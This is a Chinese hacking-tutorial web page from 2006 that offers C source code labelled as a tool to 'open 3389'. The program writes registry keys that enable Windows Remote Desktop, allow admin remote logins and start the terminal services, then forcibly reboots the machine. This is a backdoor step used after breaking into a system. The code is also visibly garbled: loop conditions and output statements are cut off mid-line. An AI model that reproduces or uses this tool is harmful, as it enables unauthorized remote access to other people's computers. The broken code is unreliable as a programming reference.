黑客编程：开3389的源代码(C源码)--黑客,编程,3389,源代码

作者：佚名来源：网上收集发布时间：2006-6-5 23:16:21

#include "windows.h"
#include "windows.h"
#include "iostream.h"

void main(int argc, char* argv[])
{
HKEY hKey;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
LPCTSTR key[]={"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache\\",
"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\",
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\",
"SYSTEM\\CurrentControlSet\\Services\\TermDD\\",
"SYSTEM\\CurrentControlSet\\Services\\TermService\\",
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\",
".DEFAULT\\Keyboard Layout\\Toggle\\"};
HKEY head[]={HKEY_LOCAL_MACHINE, HKEY_LOCAL_MACHINE,
HKEY_LOCAL_MACHINE,HKEY_LOCAL_MACHINE,
HKEY_LOCAL_MACHINE,HKEY_LOCAL_MACHINE,
HKEY_USERS};
DWORD type[] = {REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_DWORD,REG_SZ};
LPCTSTR value[] = {"\x00\x00\x00\x00", "\x01\x00\x00\x00", "\x01\x00\x00\x00", "\x02\x00\x00\x00", "\x02\x00\x00\x00", "\x3d\x0d\x00\00", "2"};
DWORD length[] = {4, 4, 4, 4, 4, 4, 2};
LPCTSTR name[] = {"Enabled","EnableAdminTSRemote","TSEnabled","Start","Start","PortNumber","Hotkey"};
for(int i = 0; i RegCreateKeyEx(head[i],key[i],0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE,NULL,&hKey,NULL);
for(i = 0; i {
if(::RegOpenKeyEx(head[i], key[i], 0, KEY_WRITE, &hKey) != ERROR_SUCCESS)
{
cout return;
}
if(::RegSetValueEx(hKey, name[i], 0, type[i], (LPBYTE)value[i], length[i]) != ERROR_SUCCESS)
{
cout return;
}
}
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
if(!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken)
||!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID))
{
cout return;
}
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE | EWX_REBOOT, 0);
return;
}